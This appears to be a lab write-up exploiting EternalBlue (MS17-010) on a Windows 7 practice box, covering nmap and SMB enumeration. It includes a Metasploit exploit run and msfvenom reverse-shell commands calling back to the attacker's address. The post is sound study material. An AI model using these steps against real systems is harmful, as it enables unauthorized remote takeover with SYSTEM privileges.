This post was submitted to Juejin's 「新人创作礼」 (new creator) event.
MS17-010, better known as EternalBlue. This is a very simple box: there is essentially no privilege-escalation step, because a successful MS17-010 exploit already runs as NT AUTHORITY\SYSTEM (the bug is in the kernel-mode SMBv1 driver srv.sys, so the payload executes with SYSTEM privileges).
Reconnaissance
Standard procedure
Start with a full TCP port scan with nmap:
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.40
Host is up (0.021s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
oxdf@parrot$ nmap -p 135,139,445 -sCV -oA scans/nmap-tcpscripts 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:01 EDT
Nmap scan report for 10.10.10.40
Host is up (0.018s latency).
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -17m06s, deviation: 34m38s, median: 2m53s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_System time: 2021-05-04T02:04:49+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_Message signing enabled but not required
| smb2-time:
| date: 2021-05-04T01:04:52
|_start_date: 2021-05-04T00:54:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds
The scan shows ports 135, 139 and 445 open, and the service banner on 445 identifies the host as Windows 7 Professional SP1 (build 7601).
A textbook MS17-010 (EternalBlue) candidate.
Next, run nmap's vuln script category (covered in the earlier nmap post) against port 445; the smb-vuln-* scripts report which known Microsoft SMB vulnerabilities the host appears to have without exploiting them. Note that the category also contains intrusive checks (smb-vuln-ms10-054 can crash the target), so against anything that is not a lab box prefer --script smb-vuln-ms17-010 on its own:
nmap -p 445 --script vuln 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:17 EDT
Nmap scan report for 10.10.10.40
Host is up (0.019s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
|           servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 24.85 seconds
445 - SMB
Enumerate the shares with smbmap:
smbmap -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
oxdf@parrot$ smbmap -H 10.10.10.40 -u "0xdf" -p "0xdf"
[+] Guest session   	IP: 10.10.10.40:445	Name: 10.10.10.40
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	Share                                             	READ ONLY
	Users                                             	READ ONLY
With no credentials smbmap lists nothing, but with a made-up username and password the server falls back to a guest session, which shows two readable shares, Share and Users (ADMIN$, C$ and IPC$ are off-limits to guests). Connect to each with smbclient (anonymous login, just press Enter at the password prompt):
smbclient //10.10.10.40/share
smbclient //10.10.10.40/users
Both shares turn out to be empty.
Getting SYSTEM
Since MS17-010 is confirmed, there is no privilege escalation to worry about: a successful exploit lands directly as SYSTEM. Two approaches are shown, Metasploit and a manual script.
Metasploit (msf)
msf6 > search ms17-010
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
Of these, 4 is only a detection scanner and 3 is single-command execution; 1 targets Windows 8 and later; 5 requires the DOUBLEPULSAR backdoor to already be implanted on the host. That leaves 0 and 2 to try in turn. I got a shell with 2, but did not save the output, so the run of module 0 shown here is 0xdf's.
Start with module 0. It depends on kernel pool grooming, so it can fail or blue-screen the target; module 2 (ms17_010_psexec) is usually the more reliable option when a named pipe is reachable.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.10.40      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.14      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.14:4444
[*] 10.10.10.40:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.14:4444 -> 10.10.10.40:49173) at 2021-05-03 21:32:51 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
It may need several attempts; it took me three or four tries before it succeeded.
Manual
Use the Python scripts from GitHub - helviojunior/MS17-010 (https://github.com/helviojunior/MS17-010). Its send_and_execute.py uploads an executable to the target through the MS17-010 bug and runs it as SYSTEM, so all we need to supply is a reverse-shell executable. Generate one with msfvenom (LHOST is your own VPN address, which is why it differs from the 10.10.14.14 used in the Metasploit run above):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe
Start the listener first, because the executable connects back the moment the script runs it:
nc -lvnp 4444
Then, from a second terminal, send and execute the payload (the script depends on the impacket library via the bundled mysmb.py):
python send_and_execute.py 10.10.10.40 backdoor.exe
When the shell arrives in the nc window, whoami should report nt authority\system.